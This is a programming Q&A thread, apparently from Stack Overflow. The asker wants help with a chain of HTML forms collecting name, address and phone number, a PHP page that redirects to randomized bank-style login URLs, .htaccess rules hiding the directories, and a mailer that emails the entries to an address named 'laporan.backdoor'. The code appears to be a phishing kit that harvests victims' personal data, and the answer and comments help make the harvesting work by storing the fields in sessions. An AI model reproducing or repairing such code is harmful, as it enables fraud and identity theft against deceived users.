# Multiple Input value using $_SESSION and $_POST

Tags: php, html, .htaccess

Please help me with this question

I have 3 page html

Page 1 login.html

```
<form action='detail.html' method='post'>Name:<input type='text'
name='enteruser'/> <input type='submit' value='Submit'/></form>"
```

Page 2 detail.html

```
<form action='contact.html' method='post'>
Address: <input type='text' name='Address'/>
<input type='submit' value='Submit'/></form>";
```

Page 3 contact.html

```
<form action='send.php' method='post'>
Phone Number: <input type='text' name='contactid'/>
<input type='submit' value='Submit'/></form>";
```

in defferen directory /a /b /c

to replace the orginal page I using php code like this for give me random url:

```
<?
<html><head> 
<meta http-equiv="refresh" content="0; URL=Login.php?msg=OnlineIdEmpty&request_locale=<?echo
rand();?>&statusCode=<?echo md5(uniqid(time()));?>"> 
<script language="JavaScript" type="text/javascript"> 
<!-- 
function redirect() {setTimeout("window.location.replace(Login.php?msg=OnlineIdEmpty&request_locale=<?echorand();?>&statusCode=<?echo md5(uniqid(time()));?>')", 0); } 
--> 
</script> 
</head>
?>
```

and every directory I give .htaccess 404

but when I try to obtain all input value of page to my email
using php code:

```
<?
$do = "mail";
$browser = $_SERVER['HTTP_USER_AGENT'];
$ip = getenv("REMOTE_ADDR");
$message .= "---------------Log-----------------\n";
$message .= "Name: ".$_POST['enteruser']."\n";
$message .= "Address: ".$_POST['Address']."\n";
$message .= "Phone: ".$_POST['contactid']."\n";
$send = "laporan.backdoor@gmail.com";
$subject = "Report";
$headers = "From: Customer<newlog@blalala.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
$do($er,$subject,$message,$headers);
}
?>
```

I got blank info into my email, could you tell what wrong with the
source code or maybe I do something wrong?

because I has been put `session_start() $_SESSION` and `$_POST`
every html page, but it still does not work

Comment: What do you mean by "to replace the orginal page I using php code like this for give me random url"? You want to replace the pages `login.html`, `detail.html`, `contact.html`?

Comment: What do you mean by "and every directory I give .htaccess 404"?

Comment: Like this http://colleyvilleaccidentattorney.com/test/index.php but the original page is http://colleyvilleaccidentattorney.com/test/login.html

Answer (score 0):

when you submit login.html, save the value of enteruser in session, and whe you submit contact.html save the value of Address in the session, then you can use these values in the contact form, like this:

```
$message .= "Name: ".$_SESSION['enteruser']."\n";
$message .= "Address: ".$_SESSION['Address']."\n";
```

and check now...

Comment: not work I has try put it into html page or on Index.php

Comment: change all the .html files to .php and put the above code in contact.php, and put $_SESSION['enteruser']=$_POST['enteruser'] in detail.php file after renaming the file, and also put  $_SESSION['Address']=$_POST['Address'] in contact.php